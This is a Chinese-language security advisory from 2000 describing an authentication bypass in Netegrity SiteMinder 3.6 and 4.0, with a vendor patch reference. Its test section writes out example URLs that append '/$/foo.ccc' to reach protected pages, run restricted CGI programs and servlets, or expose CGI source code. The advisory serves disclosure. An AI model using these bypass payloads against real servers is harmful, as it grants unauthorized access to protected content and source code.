安全研究

安全漏洞
Netegrity SiteMinder 可以绕过其认证机制

发布日期:2000-09-15
更新日期:2000-09-15

受影响系统:

Netegrity SiteMinder 4.0
Netegrity SiteMinder 3.6
   - Sun Solaris 2.x
   - Microsoft Windows NT 4.0
描述:

Netegrity's SiteMinder 软件用来为服务器上的web页面提供访问控制。然而,通过提交一个
特殊的链接,一个未经认证的客户也可以获取对受保护内容的读或执行权限。

如果在链接后面增加字符串 '/$/nonexistantfile.ext',服务器就会不进行身份认证而直接处
理用户期望的请求。这个不存在文件的后缀可以是.ccc,.class,.jpg.

如果要访问的受限内容是cgi程序,其所要求的值可以在增加的字符串后面输入。如果不输入
要求的变量,服务器将返回CGI的源代码。

<*来源: @stake Inc. Security Advisory
         http://www.atstake.com/research/advisories/2000/a091100-1.txt
*>


测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!


1. 如果受限页面为:

http://www.mysite.com/cgi-bin/secrets.html

如果使用:

http://www.mysite.com/cgi-bin/secrets.html/$/foo.ccc
就可以看到secrets.html的内容。

2. 如果受限的CGI程序为:

http://www.mysite.com/cgi-bin/restricted.cgi

使用下列链接就可以执行这个程序:

http://www.mysite.com/cgi-bin/restricted.cgi$/foo.ccc?subject=blah

使用下列链接就可以察看这个程序源代码:

http://www.mysite.com/cgi-bin/restricted.cgi/$/foo.ccc

使用下列链接就可以执行一个servlet:

http://www.mysite.com/applets/restricted/$/foo.ccc?query=blah




建议:

厂商补丁:

netegrity已经提供了补丁程序:

http://www.netegrity.com/services/online/



浏览次数:7054
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障